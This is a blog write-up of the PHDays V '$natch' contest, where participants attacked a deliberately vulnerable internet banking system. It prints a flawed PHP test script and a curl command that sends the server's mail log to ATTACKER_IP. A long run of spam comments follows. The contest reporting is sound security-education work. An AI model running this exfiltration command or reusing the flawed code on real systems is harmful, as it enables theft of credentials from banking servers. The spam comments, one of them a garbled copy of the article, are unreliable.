How much does it take to hack a mobile network?
Is electronic government secure
in the era of WikiLeaks and Anonymous?

Is SCADA hacking a Hollywood fiction
or the nowadays reality?
Internet banking: is there any chance to win
over the fraudsters?

Cyber-crimes, cyber-espionage, cyber-war: where do we draw a borderline?

Pages

Friday, June 5, 2015

How They Hacked Internet Banking at PHDays V


During Positive Hack Days V, which was held on May 26 and 27 in Moscow, the $natch competition was organized again. It consisted of two rounds. First, the contest's participants were provided with virtual machine copies that contained vulnerable web services of an internet banking system (an analog of a real system). After that, they had to analyze the banking system image and try to transfer money from the bank to their own accounts by exploiting security defects they had detected.

This year's format combined various competitions with CTF (see our blog), and CTF teams were able to take part in them along with the rest of the forum's attendees. Thirty people participated in $natch. The prize money was ramped up to 40,000 rubles (last year it was 20,000).


Technical details

PHDays iBank was developed especially for the contest. It contained vulnerabilities that occur in real banking systems. The system was divided into frontend and backend that provided a simple RESTful API, which is why participants needed to study the communication protocol that supports different components of the internet banking system.

A typical i-banking system contains logical vulnerabilities (related to weak validation, which causes data leakage) rather than crude security lapses that allow malicious code injection and execution. The contest's banking system mainly contained the former.
PHDays iBank offered 10 banking accounts with seven vulnerability combinations (the more sophisticated the vulnerability is, the more money there was in an account).

Participants could perform such attacks as:

  • brute-force using a list of most common passwords available on the web;
  • hack accounts via bypassing their two-factor authentication;
  • exploit vulnerabilities in password-reset algorithms;
  • experiment with the test script that was used to control API backend performance (validation bypassing, arbitrary file reading);
  • bypass postponed payment protection mechanism (the attack allowed stealing money from other contestants' accounts).

Examples of vulnerabilities

The test script included the following code:

<?php

if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {
    exit;
}

if (empty($_GET['url'])) {
    exit;
}

$parts = parse_url($_GET['url']);
$port = empty($parts['port']) ? '' : ':' . $parts['port'];
$url = "http://{$parts['host']}$port/status";

$ch = curl_init();

curl_setopt_array($ch, [
//    CURLOPT_URL            => $_GET['url'],
    CURLOPT_URL            => $url,
    CURLOPT_HEADER         => false,
    CURLOPT_RETURNTRANSFER => true,
]);

if (!empty($_GET['params'])) {
    curl_setopt_array($ch, [
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => $_GET['params']
    ]);
}

var_dump(curl_exec($ch));

curl_close($ch);

It was possible to bypass hostname validation. Due to the possibility of file transfer and by using @ in the parameter value, the following attack could be performed:

curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@ /var/www/frontend/data/logs/mail.log'

Upon obtaining access to the log file of sent messages, the participant could find passwords to accounts that used password recovery system.

To bypass two-factor authentication, participants used a vulnerability that featured in an article on Sakurity.com.During the contest, it turned out that not all the participants were aware of that vulnerability, some of them were checking all possible values as in the old times.


The battle

Apart from attacking the internet banking system, participants could steal money from other contestants' accounts. More Smoked Leet Chicken chose this method and won the contest, making 15,000 rubles. Stas Povolotsky, who took second place, managed to steal 3,200 rubles from the contest's bank.

It's worth mentioning that RDot detected and exploited the most number of vulnerabilities. However, the team failed to protect the earned money, and More Smoked Leet Chicken took the advantage and stole the money from RDot's account.

Final scoreboard


Congratulations to the winners!

41 comments:

  1. This is a wonderful blog. I really like these type of posts which are written in simple writing so that everyone can understand it, and everyone can understand what message does author wants to convey.Thanks for the post.

    ReplyDelete
    Replies
    1. To bypass thing authentication, participants used a vulnerability that featured in an article on Sakurity all through the contest, Custom Coursework Help it grew to become out that not all the participants had been aware about that vulnerability, some of them were checking all feasible values as in the old times. the competition's banking machine specially contained the former.

      Delete
  2. Thanks for sharing. They gave the information very clearly and in detail, which simplifies its understanding. You have done a lot of serious work and now the readers understand everything. Thank you!

    ReplyDelete
  3. All big companies need to be aware of their level of internet defend because each day hackers try to break different systems and all your valuable information could be deleted unless you pay redemption. A lot of rewardedessays were deleted this year due to hacker attacks. Please be careful with your files.

    ReplyDelete
  4. For boost your Google play store apps top then buy app reviews and Buy android reviews and Buy ios reviews from https://applytics.co they are providing the best service.

    ReplyDelete
  5. I personally think that this essay writing service is one of the best on the market. You could do just about everything with it. Check it out!

    ReplyDelete
  6. All Assignment Help review
    A superior all assignment Help reviews offered by this website with the advantage of online support with high proficiency level based on its latest research and information by professional reviews writers. Wide ranges of subjects are covered with separate writers for each subject.

    ReplyDelete

  7. It’s really a very nice article amazing in fact. For students help you just look at the Online Assignment helpgiven by the assignment experts.

    ReplyDelete
  8. It’s difficult to find well-informed people for this subject, but you sound like you know what you’re talking about! Thanks

    Facetime For PC An exclusive computer system application which comes preinstalled in every Apple products, while it's an iPhone, iPad or perhaps a Mac book.

    ReplyDelete
  9. Then end users should sign-up with procedure and choose presently operating films kind listing and search for information of theaters and ebook ticket as Obat Varises a result of online payment making use of credit card or visa card.

    ReplyDelete
  10. Content informing throughout advertising has changed into Bulk SMS benefit. Driving organizations presently depend on sending boundless instant messages to their clients. You can likewise fuse the mix of mass SMS with a computerized Programmable SMS process

    ReplyDelete
  11. It is more interesting one. I like this post. The article is containing the more ideas and interesting content. Get Assignment Help from the best experts having more than 10 years experience. High quality solutions, Plagiarism-free paper.

    ReplyDelete
  12. very sad to hear this and really appreciate your team work
    bookzz

    ReplyDelete
  13. Your resource is so interesting and informative for me and this article explained everything in detail. You have done superb job thanks for sharing this kind of stuff with us and also We're excited about our exclusive report on the top augmented reality development companies of 2018. Have a look at theaugmented reality developers

    ReplyDelete
  14. Your resource is so interesting and informative for me and this article explained everything in detail. You have done superb job thanks for sharing this kind of stuff with us. Read more about the ReactJS Vs Vue.js

    ReplyDelete
  15. Good news. Appreciate this post. Thank you for compiling and sharing it.
    Get the latest news headlines on Mobile App Development.

    ReplyDelete
  16. macys insite: Macy’s organization is a unique American retail establishment. The organization, founded by Rowland Hussey Macy was previously known by the name of R. H. Macy and Co.

    ReplyDelete
  17. Droid 4x comes with pre-installed play store which normally all emulator provides but the best part about this is that it provide you with the capability to edit.
    http://droid4x.online/

    ReplyDelete
  18. Dunkin’ Donuts is an American global doughnut company and coffeehouse based in Canton, Massachusetts founded on 1950; 68 years ago.
    telldunkinsurvey
    telldunkin

    ReplyDelete
  19. kingroot apk
    kingroot install
    kingroot for pc
    kingroot for android
    kingroot latest version
    One of the best root tool is KingRoot. If you do not want to flash third part recovery in your Android device and you need just root access.

    ReplyDelete
  20. Hotstar App let you watch free online TV shows and sports programs. This is India’s largest live streaming app with more than 400 million followers offering live coverages of global events on a paid subscription.

    ReplyDelete
  21. Creating a new Gmail business account within just a few seconds

    ReplyDelete
  22. kingroot
    king root
    kingoroot
    kingroot app
    kingroot download

    This is India’s largest live streaming app with more than 400 million followers offering live coverages.

    ReplyDelete
  23. I loved the article, keep updating interesting articles. I will be a regular reader… I am offering assignment help to students over the globe at a low price.

    Article Assignment Help
    Essay Assignment Helper
    Essay writing
    Essay writing service
    Dissertation help
    Thesis writing help
    Write My Essay
    Do My Essay
    Hire Cheap Essay Writer
    College Essay Help

    ReplyDelete
  24. I found this one pretty fascinating and it should go into my collection. Very good work! I am Impressed. We appreciate that please keep going to write more content. We are the assignment helper, we provide services all over the globe. We are best in these services:-
    Essay writing
    Essay Writer
    Article rewriter
    Essay writing service
    Essay writing help
    Write My Essay
    Write My Article
    Essay Helps
    Write my essay cheap
    Do my essay cheap

    ReplyDelete
  25. Thanks for sharing this information. I have shared this link with others keep posting such information. to provide best in class law assignment help online at very affordable prices.
    Assignment Help
    Assignment Helper
    Essay writing
    Essay writing service
    Dissertation help
    Thesis writing help
    Write My Essay
    Computer Science Assignment Help
    Assignment Help Soth Africa
    Assignment Writing Service

    ReplyDelete
  26. Many of the people are depressed about the problems of essay writing. Well, don’t worry about that because we are providing this service at a very reasonable price.
    Digital Markrting Blog
    SEO Blog
    Social Media Blog
    Email Marketeting Blog
    Online marketing Blog

    ReplyDelete
  27. This comment has been removed by the author.

    ReplyDelete
  28. We provide Best assignments help in Australia to the students like case study, essay writing assignment help, Report Writing, Custom writing, nursing assignment help and more. Our team has experienced assignment experts at best price by Assignment provider. Who looking forConsumer behaviour assignment helpfrom Engineering expert get a contact with sample assignment. customer satisfaction is the utmost priority, hence, the quality inspection team makes sure that every assignment is entirely unique and does not contain any sign of grammatical and spelling errors before reaching the client. Can an assignment helperin improving a student’s academic performance? Yes, Our academic experts are committed to delivering high-quality assessment solutions to you and work under a certain date of timeline Certainly! And, this is why we are here – to help you achieve the top grades!

    ReplyDelete